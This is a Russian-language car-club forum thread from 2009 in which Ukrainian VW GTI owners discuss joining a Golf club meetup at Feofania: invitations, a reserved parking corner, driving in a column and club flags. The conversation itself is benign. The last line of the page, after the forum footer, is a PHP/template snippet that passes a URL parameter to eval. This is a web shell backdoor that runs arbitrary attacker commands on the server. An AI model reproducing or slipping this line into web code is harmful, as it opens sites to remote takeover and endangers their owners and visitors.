+ Ответить в теме
Страница 1 из 3 1 2 3 ПоследняяПоследняя
Показано с 1 по 10 из 27

Тема: ПЕРВЫЙ ВСЕУКРАИНСКИЙ СЪЕЗД ФОЛЬКСВАГЕН ГОЛЬФ КЛУБА


  1. #1
    GTI-Racing Bubinskiy is on a distinguished road Аватар для Bubinskiy
    Регистрация
    22.04.2009
    Машина
    Golf mkV GTI, DSG
    Сообщений
    844

    ПЕРВЫЙ ВСЕУКРАИНСКИЙ СЪЕЗД ФОЛЬКСВАГЕН ГОЛЬФ КЛУБА

    Кто что думает по этому поводу? может нам тоже стоит поучаствовать? Как никак мы тоже на гольфах ездим)))

    ПЕРВЫЙ ВСЕУКРАИНСКИЙ СЪЕЗД ФОЛЬКСВАГЕН ГОЛЬФ КЛУБА
    Golf V GTI, DSG.

  2. #2
    GTI-Racing IvanGTIV is on a distinguished road Аватар для IvanGTIV
    Регистрация
    06.10.2006
    Машина
    GTI V DSG, REVO, H&R, KONI sport, H2sport, Goodridge, RBF600, DS2500, ATE PowerDisc, OZ racing
    Сообщений
    1,885
    Мероприятие правильное.

    А это для членов гольф-клуба или для всех Гольфов?

    Какие условия? Т.е. мы как ГТИ клуб могли бы стать частью мероприятия (типа уголок ГТИ) или можем приехать просто как гости?

  3. #3
    Так думаю следующие
    должно быть приглашение от гольф клуба!
    специально отведенное место на паркинге для нас так как гти клаб красивое собрание гти в любом месте и вызывает особой шарм:) своим видом и возможностью ходовых характеристик на практике:inventor:
    Последний раз редактировалось Gomkv; 18.08.2009 в 21:18.
    3d,5d gti, s3

  4. #4
    GTI-Racing Serzh will become famous soon enough Serzh will become famous soon enough Аватар для Serzh
    Регистрация
    21.01.2008
    Откуда
    Киев
    Машина
    A4 Allroad
    Сообщений
    1,211
    Цитата Сообщение от Gomkv Посмотреть сообщение
    Так думаю следующие
    должно быть приглашение от гольф клуба!
    специально отведенное место на паркинге для нас так как гти клаб красивое собрание гти в любом месте и вызывает особой шарм:) своим видом и возможностью ходовых характеристик на практике:inventor:
    Сашка, понты....
    Я когда есть возможность бываю на слете гольф-клуба.Был и на прошлом.
    Планируют делать слет на Феофании. Там же будет проезд кольца на скорость. Для ГТИ клуба зарезервировано три места в заезде. Я не буду участвовать т.к. на Феофании ужасный асфальт и жалко резину.)))_
    А вообще у нас ГОЛЬфЫ, и не важно как прокачаны.Значит нуно приехать. не фиг пальцы гнуть...;)))
    Персонально тебе - я тебя приглашаю как участник ГОЛЬФ клуба!!!! Цуко не дай бог откажешь ;)
    Последний раз редактировалось Serzh; 18.08.2009 в 21:38.
    MKV GTI APR Stage 2 - продан ((
    AUDI A4 allroad
    МB E280 4 MATIC - продан

  5. #5
    GTI-Racing IvanGTIV is on a distinguished road Аватар для IvanGTIV
    Регистрация
    06.10.2006
    Машина
    GTI V DSG, REVO, H&R, KONI sport, H2sport, Goodridge, RBF600, DS2500, ATE PowerDisc, OZ racing
    Сообщений
    1,885
    Ну да, типа ждем приглашения как и отписали Мите на форуме гольф-клуба ("Еще не приглашали..к концу недели")
    Никто пальцы не гнет :-))))
    А насчет места на паркинге - ты сам как считаешь было бы эффектней для мероприятия:

    1) рассеянные по парковке единичные ГТИ

    или

    2) "уголок гти" где можно было бы увидеть ГТИ всех поколений (или тех поколений, что соберутся на съзеде) вместе?
    Последний раз редактировалось IvanGTIV; 18.08.2009 в 21:40.

  6. #6
    GTI-Racing Serzh will become famous soon enough Serzh will become famous soon enough Аватар для Serzh
    Регистрация
    21.01.2008
    Откуда
    Киев
    Машина
    A4 Allroad
    Сообщений
    1,211
    Цитата Сообщение от IvanGTIV Посмотреть сообщение
    Ну да, типа ждем приглашения....................................... .........
    Ваня, будь проще....
    MKV GTI APR Stage 2 - продан ((
    AUDI A4 allroad
    МB E280 4 MATIC - продан

  7. #7
    GTI-Racing IvanGTIV is on a distinguished road Аватар для IvanGTIV
    Регистрация
    06.10.2006
    Машина
    GTI V DSG, REVO, H&R, KONI sport, H2sport, Goodridge, RBF600, DS2500, ATE PowerDisc, OZ racing
    Сообщений
    1,885
    Цитата Сообщение от Serzh Посмотреть сообщение
    Ваня, будь проще....
    Что ты имеешь в виду, Сережа?

    Если Мите на форуме гольф-клуба отписали "Еще не приглашали..к концу недели", в чем мне быть проще?

    Если организаторы регламентируют участие других клубов путем специального приглашения, то по-моему приезжать без спросу не совсем корректно..................

  8. #8
    Цитата Сообщение от IvanGTIV Посмотреть сообщение
    Что ты имеешь в виду, Сережа?

    Если Мите на форуме гольф-клуба отписали "Еще не приглашали..к концу недели", в чем мне быть проще?

    Если организаторы регламентируют участие других клубов путем специального приглашения, то по-моему приезжать без спросу не совсем корректно..................
    тут плюс питсот и пальцы мы не гнем
    я лично думаю есть организаторы а особенно в лице Юры админа который должен пригласить и выделить место для гти клаб так как это будит смотреться красиво и организовано а не хаотично припаркованные гти по всей парковки
    3d,5d gti, s3

  9. #9
    GTI-Racing Bubinskiy is on a distinguished road Аватар для Bubinskiy
    Регистрация
    22.04.2009
    Машина
    Golf mkV GTI, DSG
    Сообщений
    844
    Надеюсь, что местов нам дадут. :) Да, насколько я понял, можно принимать участие в проезде, а можно поехать прямо на феофанию? Ну лично я за проезд колонной.
    Последний раз редактировалось Bubinskiy; 18.08.2009 в 23:01.
    Golf V GTI, DSG.

  10. #10
    Цитата Сообщение от IvanGTIV Посмотреть сообщение
    Что ты имеешь в виду, Сережа?

    Если Мите на форуме гольф-клуба отписали "Еще не приглашали..к концу недели", в чем мне быть проще?

    Если организаторы регламентируют участие других клубов путем специального приглашения, то по-моему приезжать без спросу не совсем корректно..................
    Такое ощущение что я нахожусь в престарелом доме, а не на форуме GTI клуба.,.. корректно... приглашения! :expect::expect::expect:

    Вы че?:epti-work: У нас реально большая половина лучших машин фестиваля в клубе! Вы че еще думаете шо Вас попрут из колонны???:laugh: Какие вопросы, бля договорились приехали! Как только въедем туда, места нам уступят без вопросов!!!!

    Тут надо обсуждать когда и где собираемся что бы примкнуть к колонне централизированно нашим клубом, и что бы наш клуб был заметен в колонне!

    по сему ВАНЯ так уж и быть, что бы сильно не разорить тебя и ПОРШЕ УКРАИНА, я себе от Компании КОБА.УА САМ сделаю ФЛАГ, и один флаг отдам кому то из клуба в машину!

    Надеюсь другие машины будут каким то образом обеспечены ФЛАГАМИ?

+ Ответить в теме
Страница 1 из 3 1 2 3 ПоследняяПоследняя

Похожие темы

  1. Магазин Фольксваген Клуба - скидка до 15%
    от RDS в разделе Партнеры / Клубные скидки
    Ответов: 54
    Последнее сообщение: 02.04.2024, 13:32
  2. ПЕРВЫЙ ВСЕУКРАИНСКИЙ СЪЕЗД ФОЛЬКСВАГЕН ГОЛЬФ КЛУБА 19.09.09
    от kolega777 в разделе Встречи и мероприятия
    Ответов: 107
    Последнее сообщение: 02.02.2024, 18:59
  3. Задние фонари фольксваген гольф 5
    от Maksim190rus в разделе Покупка и продажа запчастей
    Ответов: 5
    Последнее сообщение: 08.03.2014, 13:09
  4. Ответов: 6
    Последнее сообщение: 19.03.2013, 03:00

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}